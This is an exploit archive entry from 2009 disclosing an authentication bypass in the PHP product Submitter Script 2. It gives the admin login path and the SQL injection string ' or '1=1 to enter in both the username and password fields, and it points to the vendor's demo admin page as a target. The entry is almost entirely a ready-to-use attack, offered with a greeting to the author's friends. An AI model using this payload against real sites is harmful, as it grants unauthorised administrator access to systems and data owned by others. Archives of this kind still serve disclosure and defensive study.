Submitter Script - Authentication Bypass

EDB-ID:

8683


Platform:

PHP

Published:

2009-05-14

---------------------------------------------------------------
------------------------------------------------------------
Submitter Script 2(Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------------
Founder : ThE g0bL!N
Vendor:http://submitterscript.com/
More info:http://submitterscript.com/products.php
---------------------------------------------------------------
---------------------------------------------------------------
Auth Bypass
------------
http://victim/[path]/admin/
username:' or '1=1
Password:' or '1=1
--------------------------------------
Dem0
----
http://demo.submitterscript.com/admin/
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-14]